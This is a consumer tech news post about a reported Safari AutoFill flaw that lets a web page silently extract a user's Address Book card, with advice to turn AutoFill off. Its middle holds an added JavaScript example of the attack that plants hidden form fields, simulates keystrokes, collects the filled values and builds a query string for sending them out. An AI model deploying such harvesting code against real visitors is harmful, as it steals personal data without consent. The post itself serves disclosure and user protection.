Turn Off Your Safari AutoFill, a Nasty Exploit Could Steal Your Address Book

The web's full of vulnerabilities, but this exploit, which lets a malicious web page quietly pull the personal card from your Mac's Address Book through Safari's AutoFill, seems bad enough that you should probably take a few seconds to disable AutoFill, just to be safe.


9to5Mac is bringing attention to the exploit, which was disclosed and covered in detail by Jeremiah Grossman:

These fields are AutoFill'ed using data from the user's personal record in the local operating system address book. Again it is important to emphasize this feature works even though a user never entered this data on any website. Also this behavior should not be confused with normal auto-complete data a Web browser may remember after it's typed into a form.

All a malicious website would have to do to surreptitiously extract Address Book card data from Safari is dynamically create form text fields with the aforementioned names, probably invisibly, and then simulate A-Z keystroke events using JavaScript. When data is populated, that is AutoFill'ed, it can be accessed and sent to the attacker.

As shown in the proof-of-concept code (graciously hosted by Robert "RSnake" Hansen), the entire process takes mere seconds and represents a major breach in online privacy. This attack could be further leveraged in multistage attacks including email spam, (spear) phishing, stalking, and even blackmail if a user is de-anonymized while visiting objectionable online material.
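The harvesting loop Grossman describes, written out as an added example. This is not his proof-of-concept and not the code RSnake hosted; the field names, the use of keydown events, and the stub document (which only imitates a browser that completes a field when a typed letter matches the first letter of a stored card attribute) are all assumptions made so the logic can be read and run outside a browser.

```javascript
// Added illustration of the three steps in the quoted description:
// 1. plant hidden text fields named like address-card attributes,
// 2. fire A-Z keystroke events at each one,
// 3. read back whatever the browser filled in.
// Not Grossman's PoC. Field names and the keydown event type are guesses;
// the original post's exact names are not reproduced on this page.

const CANDIDATE_FIELDS = ["name", "company", "city", "state", "country", "email"]; // assumed

// Synthetic keystroke: a real KeyboardEvent in a browser, a plain object elsewhere.
function makeKeyEvent(type, letter) {
  return typeof KeyboardEvent !== "undefined"
    ? new KeyboardEvent(type, { key: letter, bubbles: true })
    : { type, key: letter };
}

// Step 1: one text input per candidate name, pushed off-screen so the user sees nothing.
function plantHiddenFields(doc, names) {
  const form = doc.createElement("form");
  form.style.position = "absolute";
  form.style.left = "-9999px";
  const inputs = names.map((name) => {
    const input = doc.createElement("input");
    input.type = "text";
    input.name = name;
    form.appendChild(input);
    return input;
  });
  doc.body.appendChild(form);
  return inputs;
}

// Step 2: focus the field and send every letter A-Z until something gets filled in.
function simulateKeystrokes(input) {
  input.focus();
  for (let code = 65; code <= 90; code++) {
    input.dispatchEvent(makeKeyEvent("keydown", String.fromCharCode(code)));
    if (input.value) break;
  }
}

// Step 3: collect the populated values, keyed by field name.
function harvest(inputs) {
  const found = {};
  for (const input of inputs) {
    if (input.value) found[input.name] = input.value;
  }
  return found;
}

function runHarvest(doc, names) {
  const inputs = plantHiddenFields(doc, names);
  inputs.forEach(simulateKeystrokes);
  return harvest(inputs);
}

// The query string an attacker would append to an image or script URL.
// Nothing is sent anywhere in this example.
function buildExfilQuery(data) {
  return Object.entries(data)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join("&");
}

// Constructed stand-in for a browser document whose AutoFill completes a field
// as soon as a typed letter matches the first letter of the matching card entry.
// This is an imitation for the example, not a model of how Safari works.
function makeStubDocument(card) {
  const makeElement = () => {
    const el = { style: {}, value: "", name: "", type: "", children: [] };
    el.appendChild = (child) => el.children.push(child);
    el.focus = () => {};
    el.dispatchEvent = (ev) => {
      const stored = card[el.name];
      if (ev.type === "keydown" && stored && stored[0].toUpperCase() === ev.key) {
        el.value = stored;
      }
    };
    return el;
  };
  return { body: makeElement(), createElement: makeElement };
}

// In a real page this runs against the live document; under Node it is skipped.
if (typeof document !== "undefined") {
  console.log(buildExfilQuery(runHarvest(document, CANDIDATE_FIELDS)));
}
```

Against the stub, `runHarvest` returns only the attributes the constructed card actually carries; a field with no matching card entry stays empty and is left out of the result. In a current browser the same code plants the fields but fills nothing, since untrusted synthetic key events no longer drive AutoFill, so the stub is the only place this produces output.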


Grossman told Apple about the issue over a month ago but hasn't heard back yet, so yeah, it's probably a good idea for Safari users to open Safari's Preferences, go to the AutoFill tab, and uncheck every AutoFill option, at the very least the one that fills forms using info from your Address Book card, until this is addressed. [Jeremiah Grossman via 9to5Mac]